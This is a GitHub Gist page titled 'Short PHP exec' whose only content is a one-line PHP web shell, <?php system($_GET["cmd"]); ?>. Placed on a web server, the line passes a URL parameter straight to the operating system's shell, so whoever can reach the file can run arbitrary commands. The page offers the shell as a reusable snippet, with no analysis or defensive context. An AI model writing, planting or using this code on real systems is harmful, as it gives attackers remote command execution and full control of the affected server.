Skip to content

Instantly share code, notes, and snippets.

@ivanvza
Created April 14, 2015 13:44
Show Gist options
  • Save ivanvza/efeaace303318f4caecc to your computer and use it in GitHub Desktop.
Save ivanvza/efeaace303318f4caecc to your computer and use it in GitHub Desktop.
Short PHP exec
<?php system($_GET["cmd"]); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment